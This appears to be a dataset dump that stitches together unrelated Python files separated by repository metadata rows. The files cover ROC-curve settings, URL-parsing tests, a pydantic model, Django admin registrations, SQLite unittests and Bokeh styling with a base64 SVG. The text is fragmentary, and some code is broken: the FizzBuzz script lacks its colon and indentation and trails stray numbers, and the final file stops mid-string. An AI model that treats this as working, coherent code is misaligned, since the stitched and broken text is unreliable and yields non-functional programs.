# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
# models = ['RobotArm']
# settings = [ \
# ('SlidingMode', {'d_min': [1, 1.5, 2, 2.5, 3], 'k_v': [1, 1.5, 2], 'u_p': [1, 5, 10]}),\
# ('PotentialField', {'d_min': [1, 1.5, 2, 2.5, 3], 'lambd': [0.1, 0.2, 0.3, 1, 2, 3]}),\
# ('SafeSet', {'d_min': [1, 1.5, 2, 2.5, 3], 'yita': [1, 2, 4, 8], 'k_v': [1, 1.5, 2]}),\
# ('SublevelSafeSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# # ('SafeSublevelSet', {'d_min': [1, 2], 'k_v': [0.5, 1, 1.5, 2], 'gamma':[1, 2, 5, 10]}),\
# ('ZeroingBarrierFunction', {'d_min': [1, 2, 3, 4], 't':[0.5, 1, 2, 5], 'gamma':[0.1, 1, 5]}),\
# ]
# roc_curve(models, settings, False)
if __name__ == "__main__":
leaderboard() | 59.962264 | 282 | 0.430302 | 1,022 | 6,356 | 2.577299 | 0.113503 | 0.047077 | 0.061503 | 0.071374 | 0.761959 | 0.761959 | 0.745634 | 0.745634 | 0.745634 | 0.736143 | 0 | 0.133639 | 0.27832 | 6,356 | 106 | 283 | 59.962264 | 0.440593 | 0.7972 | 0 | 0 | 0 | 0 | 0.117498 | 0.018597 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.25 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
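roc_curve() is imported from elsewhere in the repo, so its internals are not shown here; below is a minimal, self-contained sketch of the grid search it is expected to run over a `settings` list (the helper name and exact structure are illustrative assumptions, not the project's actual code):

```python
from itertools import product

def expand_grid(settings):
    """Expand each (algorithm, parameter-ranges) pair into every
    concrete parameter combination, as a grid search would."""
    combos = []
    for algorithm, params in settings:
        names = sorted(params)
        for values in product(*(params[name] for name in names)):
            combos.append((algorithm, dict(zip(names, values))))
    return combos

settings = [
    ('SafeSet', {'d_min': [1, 2], 'yita': [1, 2]}),
    ('PotentialField', {'d_min': [1], 'k_v': [0.5, 1]}),
]
combos = expand_grid(settings)
print(len(combos))  # 4 SafeSet combinations + 2 PotentialField combinations = 6
```

Each combination would then be simulated once, yielding one (safety, efficiency) point; the convex hull over those points gives the curve plotted by roc_curve().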
8465593828cf906c8948dc64c1ab280b476caec3 | 1,522 | py | Python | test/test_get_parts_of_url.py | moj124/web_crawler | 6169c6f59cbc74f82f59a0110f3869c300d8a0d0 | [
"MIT"
] | null | null | null | test/test_get_parts_of_url.py | moj124/web_crawler | 6169c6f59cbc74f82f59a0110f3869c300d8a0d0 | [
"MIT"
] | null | null | null | test/test_get_parts_of_url.py | moj124/web_crawler | 6169c6f59cbc74f82f59a0110f3869c300d8a0d0 | [
"MIT"
] | null | null | null | import pytest
from ..crawl_website import get_parts_of_url
@pytest.mark.parametrize("links",[
["https://www.scrapethissite.com/faq/",
"https://www.scrapethissite.com/",
"https://www.scrapethissite.com/lessons/",
"https://www.scrapethissite.com/pages/",
"https://www.scrapethissite.com/login/"]
])
def test_url_format(links):
assert get_parts_of_url(links[0]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/faq/')
assert get_parts_of_url(links[1]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/')
assert get_parts_of_url(links[2]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/lessons/')
assert get_parts_of_url(links[3]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/pages/')
assert get_parts_of_url(links[4]) == ('scrapethissite.com','https://www.scrapethissite.com','https://www.scrapethissite.com/login/')
@pytest.mark.parametrize("links",[
["/",
"/login/?2",
'#hello',
'#',
' ',
''
]
])
def test_url_endpoints(links):
assert get_parts_of_url(links[0]) == ('','://','/')
assert get_parts_of_url(links[1]) == ('','://','/login/')
assert get_parts_of_url(links[2]) == ('','://','#hello')
assert get_parts_of_url(links[3]) == ('','://','#')
assert get_parts_of_url(links[4]) == ('','://',' ')
assert get_parts_of_url(links[5]) == ('','://','')
| 41.135135 | 138 | 0.644547 | 188 | 1,522 | 5 | 0.170213 | 0.361702 | 0.351064 | 0.398936 | 0.834043 | 0.726596 | 0.701064 | 0.488298 | 0.424468 | 0.356383 | 0 | 0.008909 | 0.11498 | 1,522 | 36 | 139 | 42.277778 | 0.688938 | 0 | 0 | 0.129032 | 0 | 0 | 0.434496 | 0 | 0 | 0 | 0 | 0 | 0.354839 | 1 | 0.064516 | false | 0 | 0.064516 | 0 | 0.129032 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
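The function under test lives in crawl_website.py and is not shown in this file; the sketch below is a reconstruction inferred from the assertions above, built on urllib.parse (it satisfies the tests but is not necessarily the project's actual implementation):

```python
from urllib.parse import urlparse

def get_parts_of_url(url):
    # Returns (domain without 'www.', scheme://netloc, url without query string).
    parsed = urlparse(url)
    netloc = parsed.netloc
    domain = netloc[4:] if netloc.startswith("www.") else netloc
    base = parsed.scheme + "://" + netloc
    path = url.split("?")[0]  # keeps fragments such as '#hello' intact
    return domain, base, path

print(get_parts_of_url("https://www.scrapethissite.com/faq/"))
# ('scrapethissite.com', 'https://www.scrapethissite.com', 'https://www.scrapethissite.com/faq/')
```

Note how relative inputs such as "/login/?2" have no scheme or netloc, which is why the tests expect the literal prefix '://' for them.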
ffcd8a6a665aedb48b75f8e267fd4eb09a5c901a | 568 | py | Python | monitoring_system/utils/__init__.py | NesterukSergey/Rpi_monitoring_study | a2e9431232ea59757b53dcbfdccf998178ed6264 | [
"MIT"
] | 10 | 2020-08-31T19:21:23.000Z | 2022-01-24T22:00:00.000Z | monitoring_system/utils/__init__.py | Skrisss/Raspberry_Pi_monitoring_system | 736c077576ac49775ffd59d59614d9ef97e33f1d | [
"MIT"
] | null | null | null | monitoring_system/utils/__init__.py | Skrisss/Raspberry_Pi_monitoring_system | 736c077576ac49775ffd59d59614d9ef97e33f1d | [
"MIT"
] | 9 | 2021-12-04T10:38:53.000Z | 2022-01-24T22:00:02.000Z | from monitoring_system.utils.json import *
from monitoring_system.utils.csv import write_csv, read_csv
from monitoring_system.utils.get_time import get_time
from monitoring_system.utils.txt import write_txt, read_txt
from monitoring_system.utils.get_serial_number import get_serial_number
from monitoring_system.utils.average import average
from monitoring_system.utils.list_dirs import list_dirs
from monitoring_system.utils.preprocess_cameras import *
from monitoring_system.utils.preprocess_sensors import *
| 51.636364 | 71 | 0.880282 | 83 | 568 | 5.722892 | 0.240964 | 0.294737 | 0.421053 | 0.526316 | 0.471579 | 0.214737 | 0.214737 | 0.214737 | 0 | 0 | 0 | 0 | 0.073944 | 568 | 10 | 72 | 56.8 | 0.903042 | 0 | 0 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ffeeda8b22c1d7b779d9a53c2cb4efdd915d18af | 184 | py | Python | fizzbuzz.py | hoona1011/git-flow-practice | 9d7cdd3794a6e8c9968cd29b84273f5dbf281add | [
"MIT"
] | null | null | null | fizzbuzz.py | hoona1011/git-flow-practice | 9d7cdd3794a6e8c9968cd29b84273f5dbf281add | [
"MIT"
] | null | null | null | fizzbuzz.py | hoona1011/git-flow-practice | 9d7cdd3794a6e8c9968cd29b84273f5dbf281add | [
"MIT"
] | null | null | null | for i in range(1,15+1)
if i%3==0:
print('fizz')
else:
print(i)
5
5
5
5
5
5
15
15
15
| 9.684211 | 22 | 0.277174 | 25 | 184 | 2.04 | 0.52 | 0.196078 | 0.235294 | 0.235294 | 0.117647 | 0 | 0 | 0 | 0 | 0 | 0 | 0.272727 | 0.641304 | 184 | 18 | 23 | 10.222222 | 0.5 | 0 | 0 | 0.214286 | 0 | 0 | 0.021858 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.142857 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ffefc5450ba9e766bb390ce894c7b49a9ef55757 | 149 | py | Python | wallarm_api/core/models/graph_data.py | Neraverin/wallarm-api-python | a033cfee28b1648f6bb7d1e531f353929b5d41c1 | [
"Apache-2.0"
] | null | null | null | wallarm_api/core/models/graph_data.py | Neraverin/wallarm-api-python | a033cfee28b1648f6bb7d1e531f353929b5d41c1 | [
"Apache-2.0"
] | null | null | null | wallarm_api/core/models/graph_data.py | Neraverin/wallarm-api-python | a033cfee28b1648f6bb7d1e531f353929b5d41c1 | [
"Apache-2.0"
] | null | null | null | from pydantic import BaseModel
class GraphSummaryMonthly(BaseModel):
requests_count: int
attacks_count: int
blocked_attacks_count: int
| 18.625 | 37 | 0.785235 | 17 | 149 | 6.647059 | 0.647059 | 0.212389 | 0.265487 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174497 | 149 | 7 | 38 | 21.285714 | 0.918699 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
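pydantic's BaseModel validates and coerces these fields when an instance is constructed; the sketch below is a rough stdlib approximation of that behavior (it mimics what pydantic v1 does for int fields, it is not how pydantic is implemented):

```python
from dataclasses import dataclass, fields

@dataclass
class GraphSummaryMonthly:
    requests_count: int
    attacks_count: int
    blocked_attacks_count: int

    def __post_init__(self):
        # Coerce every field to its annotated int type, raising on bad
        # input, roughly as pydantic v1 would on construction.
        for field in fields(self):
            setattr(self, field.name, int(getattr(self, field.name)))

summary = GraphSummaryMonthly(requests_count="120", attacks_count=7, blocked_attacks_count=5.0)
print(summary.requests_count, summary.blocked_attacks_count)  # 120 5
```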
082e5ede6918060692832d0876b6e1268b52677a | 159 | py | Python | someblog/admin.py | Kwpolska/django-someblog | 9b12c59785bbe7b58312f3a844f4712b6d2b3d76 | [
"BSD-3-Clause"
] | null | null | null | someblog/admin.py | Kwpolska/django-someblog | 9b12c59785bbe7b58312f3a844f4712b6d2b3d76 | [
"BSD-3-Clause"
] | null | null | null | someblog/admin.py | Kwpolska/django-someblog | 9b12c59785bbe7b58312f3a844f4712b6d2b3d76 | [
"BSD-3-Clause"
] | null | null | null | from django.contrib import admin
from someblog.models import Post, Tag, Author
admin.site.register(Post)
admin.site.register(Tag)
admin.site.register(Author)
| 22.714286 | 45 | 0.811321 | 24 | 159 | 5.375 | 0.5 | 0.209302 | 0.395349 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08805 | 159 | 6 | 46 | 26.5 | 0.889655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
f2c5347d1d210458285a8f53f5da1598625434a3 | 384 | py | Python | scgen/modules/Disruption.py | supermihi/scgen | 844144b8fb59de6a81c305ebcf0e39cf5af7c01d | [
"MIT"
] | 1 | 2020-07-29T13:48:32.000Z | 2020-07-29T13:48:32.000Z | scgen/modules/Disruption.py | supermihi/scgen | 844144b8fb59de6a81c305ebcf0e39cf5af7c01d | [
"MIT"
] | 2 | 2020-11-17T20:27:57.000Z | 2021-01-11T15:41:10.000Z | scgen/modules/Disruption.py | supermihi/scgen | 844144b8fb59de6a81c305ebcf0e39cf5af7c01d | [
"MIT"
] | 1 | 2020-11-16T12:59:40.000Z | 2020-11-16T12:59:40.000Z | from scgen.modules.BaseModule import BaseModule
from scgen.helpers.JointGeneration import generateJointly
class Disruption(BaseModule):
name = "disruption"
def __init__(self, forElements, distributions, elementList, moduleList, distributionsProvider, **additionalSettings):
super().__init__(forElements, distributions, elementList, moduleList, distributionsProvider) | 48 | 121 | 0.809896 | 33 | 384 | 9.181818 | 0.636364 | 0.059406 | 0.231023 | 0.29703 | 0.435644 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111979 | 384 | 8 | 122 | 48 | 0.888563 | 0 | 0 | 0 | 1 | 0 | 0.025974 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f2c60106fdbab06512780f1af5ae2d9dda42809a | 7,395 | py | Python | assets/misc/SQLite_Docker_Python_Challenge/test.py | oliviapy960825/oliviapy960825.github.io | 7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde | [
"CC-BY-3.0"
] | null | null | null | assets/misc/SQLite_Docker_Python_Challenge/test.py | oliviapy960825/oliviapy960825.github.io | 7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde | [
"CC-BY-3.0"
] | null | null | null | assets/misc/SQLite_Docker_Python_Challenge/test.py | oliviapy960825/oliviapy960825.github.io | 7a07fd0887e5854b0b92e4cc8e20ff1fd2219fde | [
"CC-BY-3.0"
] | null | null | null | import sqlite3
import unittest
from webservice2 import *
import warnings
import datetime
#warnings.simplefilter("ignore", ResourceWarning)
class UnitTest(unittest.TestCase):
def setUp(self):
self.conn = sqlite3.connect(":memory:")
c = self.conn.cursor()
def test_creating_table(self):
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns (
id integer PRIMARY KEY,
last_name text NOT NULL,
first_name text NOT NULL,
position_applied text NOT NULL,
school text NOT NULL,
program text NOT NULL,
date_of_entry text NOT NULL,
FOREIGN KEY (position_applied) REFERENCES positions (name)
ON UPDATE NO ACTION
);"""
#c.execute(sql_create_positions_table)
# create projects table
create_table(self.conn, sql_create_positions_table)
# create tasks table
create_table(self.conn, sql_create_interns_table)
self.conn.commit()
res = self.conn.execute("SELECT name FROM sqlite_master WHERE type='table';")
names=res.fetchall()
#result=self.assertEqual(name[0],"positions") or self.assertEqual(name[1],"interns")
#print (str(result))
        self.assertIn(("positions",), names)
        self.assertIn(("interns",), names)
#Creating table tested
def test_inserting_position(self):
position=("Software Development Intern", "This position is for software development intern")
if self.conn is not None:
c = self.conn.cursor()
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
create_table(self.conn, sql_create_positions_table)
create_position(self.conn, position)
self.conn.commit()
else:
print("Error! cannot create the database connection.")
c.execute("SELECT name from positions LIMIT 1")
result = c.fetchone()
        self.assertEqual(result[0], "Software Development Intern")
def test_inserting_intern(self):
intern_1=("A","B","Software Development Intern","GWU","Data Analytics",datetime.datetime.now())
intern_2=("C","D","Data Science Intern","GWU","Data Analytics",datetime.datetime.now())
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns (
id integer PRIMARY KEY,
last_name text NOT NULL,
first_name text NOT NULL,
position_applied text NOT NULL,
school text NOT NULL,
program text NOT NULL,
date_of_entry text NOT NULL,
FOREIGN KEY (position_applied) REFERENCES positions (name)
ON UPDATE NO ACTION
);"""
#c.execute(sql_create_positions_table)
if self.conn is not None:
c = self.conn.cursor()
# create projects table
create_table(self.conn, sql_create_positions_table)
# create tasks table
create_table(self.conn, sql_create_interns_table)
position=("Software Development Intern", "This position is for software development intern")
create_position(self.conn, position)
create_intern(self.conn, intern_1)
create_intern(self.conn, intern_2)
self.conn.commit()
else:
print("Error! cannot create the database connection.")
c.execute("SELECT first_name from interns")
result = c.fetchall()
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0][0], "B")
def test_inserting_intern_api(self):
#intern_1=("A","B","Software Development Intern","GWU","Data Analytics",datetime.datetime.now())
#intern_2=("C","D","Data Science Intern","GWU","Data Analytics",datetime.datetime.now())
interns=[{'Applicant Last Name':'A','Applicant First Name':'B','Position Applied For':'Software Development Intern','Applicant School':'GWU','Applicant Degree Program':'CS'},{'Applicant Last Name':'C','Applicant First Name':'D','Position Applied For':'Data Analytics Intern','Applicant School':'GWU','Applicant Degree Program':'CS'}]
sql_create_positions_table = """ CREATE TABLE IF NOT EXISTS positions (
name text PRIMARY KEY,
description text
); """
sql_create_interns_table = """CREATE TABLE IF NOT EXISTS interns (
id integer PRIMARY KEY,
last_name text NOT NULL,
first_name text NOT NULL,
position_applied text NOT NULL,
school text NOT NULL,
program text NOT NULL,
date_of_entry text NOT NULL,
FOREIGN KEY (position_applied) REFERENCES positions (name)
ON UPDATE NO ACTION
);"""
#c.execute(sql_create_positions_table)
if self.conn is not None:
c = self.conn.cursor()
# create projects table
create_table(self.conn, sql_create_positions_table)
# create tasks table
create_table(self.conn, sql_create_interns_table)
position=("Software Development Intern", "This position is for software development intern")
create_position(self.conn, position)
create_interns_api(self.conn, interns)
self.conn.commit()
else:
print("Error! cannot create the database connection.")
c.execute("SELECT first_name from interns")
result = c.fetchall()
        self.assertEqual(len(result), 2)
        self.assertEqual(result[0][0], "B")
def tearDown(self):
self.conn.close()
if __name__ == '__main__':
unittest.main()
| 44.281437 | 341 | 0.515889 | 715 | 7,395 | 5.183217 | 0.155245 | 0.058284 | 0.053427 | 0.068268 | 0.763896 | 0.745008 | 0.745008 | 0.745008 | 0.719104 | 0.706152 | 0 | 0.004311 | 0.404057 | 7,395 | 166 | 342 | 44.548193 | 0.836624 | 0.084381 | 0 | 0.75 | 0 | 0 | 0.570033 | 0 | 0 | 0 | 0 | 0 | 0.060345 | 1 | 0.051724 | false | 0 | 0.043103 | 0 | 0.103448 | 0.025862 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4b7498f5965e56dc6e5abe06865e425e346013eb | 9,607 | py | Python | css.py | rodluger/starry_gp_app | 0f4b50bb124ea045a4e6e26a6bf32ef93b10885a | [
"MIT"
] | 1 | 2020-08-25T01:25:27.000Z | 2020-08-25T01:25:27.000Z | css.py | rodluger/starry_gp_app | 0f4b50bb124ea045a4e6e26a6bf32ef93b10885a | [
"MIT"
] | null | null | null | css.py | rodluger/starry_gp_app | 0f4b50bb124ea045a4e6e26a6bf32ef93b10885a | [
"MIT"
] | null | null | null | from bokeh.models import Div
from plasma import plasma
__all__ = ["svg_mu", "svg_sigma", "style"]
# SVG: Greek mu
svg_mu = lambda: Div(
text="""
<img src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjwhLS0gQ3JlYXRlZCB3aXRoIElua3NjYXBlIChodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy8pIC0tPgoKPHN2ZwogICB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2VsZW1lbnRzLzEuMS8iCiAgIHhtbG5zOmNjPSJodHRwOi8vY3JlYXRpdmVjb21tb25zLm9yZy9ucyMiCiAgIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyIKICAgeG1sbnM6c3ZnPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIKICAgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIgogICB4bWxuczpzb2RpcG9kaT0iaHR0cDovL3NvZGlwb2RpLnNvdXJjZWZvcmdlLm5ldC9EVEQvc29kaXBvZGktMC5kdGQiCiAgIHhtbG5zOmlua3NjYXBlPSJodHRwOi8vd3d3Lmlua3NjYXBlLm9yZy9uYW1lc3BhY2VzL2lua3NjYXBlIgogICB3aWR0aD0iNDAwIgogICBoZWlnaHQ9IjQwMCIKICAgaWQ9InN2ZzQ2MTEiCiAgIHNvZGlwb2RpOnZlcnNpb249IjAuMzIiCiAgIGlua3NjYXBlOnZlcnNpb249IjAuOTIuNCAoNWRhNjg5YzMxMywgMjAxOS0wMS0xNCkiCiAgIHZlcnNpb249IjEuMCIKICAgc29kaXBvZGk6ZG9jbmFtZT0iR3JlZWtfbGNfbXUuc3ZnIj4KICA8ZGVmcwogICAgIGlkPSJkZWZzNDYxMyIgLz4KICA8c29kaXBvZGk6bmFtZWR2aWV3CiAgICAgaWQ9ImJhc2UiCiAgICAgcGFnZWNvbG9yPSIjZmZmZmZmIgogICAgIGJvcmRlcmNvbG9yPSIjNjY2NjY2IgogICAgIGJvcmRlcm9wYWNpdHk9IjEuMCIKICAgICBncmlkdG9sZXJhbmNlPSIxMDAwMCIKICAgICBndWlkZXRvbGVyYW5jZT0iMTAiCiAgICAgb2JqZWN0dG9sZXJhbmNlPSIxLjYiCiAgICAgaW5rc2NhcGU6cGFnZW9wYWNpdHk9IjAuMCIKICAgICBpbmtzY2FwZTpwYWdlc2hhZG93PSIyIgogICAgIGlua3NjYXBlOnpvb209IjAuNyIKICAgICBpbmtzY2FwZTpjeD0iODUuOTA5MTkiCiAgICAgaW5rc2NhcGU6Y3k9IjE5MC42MTg4MyIKICAgICBpbmtzY2FwZTpkb2N1bWVudC11bml0cz0icHgiCiAgICAgaW5rc2NhcGU6Y3VycmVudC1sYXllcj0ibGF5ZXIxIgogICAgIGlua3NjYXBlOm9iamVjdC1iYm94PSJ0cnVlIgogICAgIGlua3NjYXBlOm9iamVjdC1wb2ludHM9InRydWUiCiAgICAgaW5rc2NhcGU6b2JqZWN0LW5vZGVzPSJ0cnVlIgogICAgIGlua3NjYXBlOmdyaWQtcG9pbnRzPSJ0cnVlIgogICAgIGlua3NjYXBlOndpbmRvdy13aWR0aD0iMTkyMCIKICAgICBpbmtzY2FwZTp3aW5kb3ctaGVpZ2h0PSIxMDE3IgogICAgIGlua3NjYXBlOndpbmRvdy14PSItOCIKICAgICBpbmtzY2FwZTp3aW5kb3cteT0iLTgiCiAgICAgd2lkdGg9IjQwMHB4IgogICAgIGhlaWdodD0iNDAwcHgiCiAgICAgc2hvd2dyaWQ9ImZhbHNlIgogICAgIGlua3NjYXBlOndpbmRvdy1tYXhpbWl6ZWQ9IjEiIC8+CiAgPG1ldGFk
YXRhCiAgICAgaWQ9Im1ldGFkYXRhNDYxNiI+CiAgICA8cmRmOlJERj4KICAgICAgPGNjOldvcmsKICAgICAgICAgcmRmOmFib3V0PSIiPgogICAgICAgIDxkYzpmb3JtYXQ+aW1hZ2Uvc3ZnK3htbDwvZGM6Zm9ybWF0PgogICAgICAgIDxkYzp0eXBlCiAgICAgICAgICAgcmRmOnJlc291cmNlPSJodHRwOi8vcHVybC5vcmcvZGMvZGNtaXR5cGUvU3RpbGxJbWFnZSIgLz4KICAgICAgPC9jYzpXb3JrPgogICAgPC9yZGY6UkRGPgogIDwvbWV0YWRhdGE+CiAgPGcKICAgICBpbmtzY2FwZTpsYWJlbD0iTGF5ZXIgMSIKICAgICBpbmtzY2FwZTpncm91cG1vZGU9ImxheWVyIgogICAgIGlkPSJsYXllcjEiCiAgICAgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoLTI1Ni42Nzk4LC01MzEuNzk2MykiPgogICAgPGcKICAgICAgIGFyaWEtbGFiZWw9Is68IgogICAgICAgc3R5bGU9ImZvbnQtc3R5bGU6bm9ybWFsO2ZvbnQtd2VpZ2h0Om5vcm1hbDtsaW5lLWhlaWdodDowJTtmb250LWZhbWlseTonVGltZXMgTmV3IFJvbWFuJzt0ZXh0LWFsaWduOnN0YXJ0O3RleHQtYW5jaG9yOnN0YXJ0O2ZpbGw6IzAwMDAwMDtmaWxsLW9wYWNpdHk6MTtzdHJva2U6bm9uZTtzdHJva2Utd2lkdGg6MXB4O3N0cm9rZS1saW5lY2FwOmJ1dHQ7c3Ryb2tlLWxpbmVqb2luOm1pdGVyO3N0cm9rZS1vcGFjaXR5OjEiCiAgICAgICBpZD0idGV4dDU1NDAiPgogICAgICA8cGF0aAogICAgICAgICBkPSJtIDQ4NS43MzExNCw4MDcuOTQ1OCBxIC0zNS4zNTE1NiwzNy44OTA2MyAtNjEuNTIzNDQsMzcuODkwNjMgLTE2Ljc5Njg3LDAgLTMxLjI1LC0xMi44OTA2MyB2IDEwLjM1MTU2IHEgMCwxNy45Njg3NSA1LjQ2ODc1LDM2LjEzMjgyIDYuMjUsMjAuMTE3MTggNi4yNSwyNi41NjI1IDAsOC45ODQzNyAtNS42NjQwNiwxNC44NDM3NSAtNS42NjQwNiw1Ljg1OTM3IC0xNC4wNjI1LDUuODU5MzcgLTguNTkzNzUsMCAtMTMuNjcxODcsLTYuODM1OTQgLTUuMDc4MTMsLTYuODM1OTMgLTUuMDc4MTMsLTE2LjQwNjI1IDAsLTcuMDMxMjUgNS4wNzgxMywtMjUuMzkwNjIgNS44NTkzNywtMjAuMzEyNSA1Ljg1OTM3LC0zOS40NTMxMyBWIDY2MS40NjE0MyBoIDMyLjIyNjU2IHYgMTE1LjgyMDMxIHEgMCwxNy41NzgxMiAyLjkyOTY5LDI1Ljc4MTI1IDMuMTI1LDguMjAzMTIgMTAuNzQyMTksMTMuNDc2NTYgNy44MTI1LDUuMDc4MTMgMTcuNTc4MTIsNS4wNzgxMyAxNy4zODI4MiwwIDQ1LjExNzE5LC0yMy44MjgxMyBWIDY2MS40NjE0MyBoIDMyLjQyMTg4IHYgMTM1Ljc0MjE4IHEgMCwxNy4xODc1IDMuNTE1NjIsMjMuODI4MTMgMy41MTU2Myw2LjQ0NTMxIDExLjkxNDA2LDYuNDQ1MzEgMTMuMjgxMjUsMCAxNy4xODc1LC0yNS45NzY1NiBoIDcuMDMxMjUgcSAtMy43MTA5Myw0NC4zMzU5NCAtMzcuNSw0NC4zMzU5NCAtMTQuNjQ4NDMsMCAtMjQuNDE0MDYsLTkuNzY1NjMgLTkuNTcwMzEsLTkuOTYwOTQgLTEwLjE1NjI1LC0yOC4xMjUgeiIKICAgICAgICAgc3R5bGU9ImZvbnQtc2l6ZTo0MDBweDtsaW5l
LWhlaWdodDoxLjI1O3RleHQtYWxpZ246Y2VudGVyO3RleHQtYW5jaG9yOm1pZGRsZSIKICAgICAgICAgaWQ9InBhdGg4MTQiIC8+CiAgICA8L2c+CiAgPC9nPgo8L3N2Zz4K"
width=20, height=20></img>
""",
css_classes=["custom-slider-title"],
)
# SVG: Greek sigma
svg_sigma = lambda: Div(
text="""
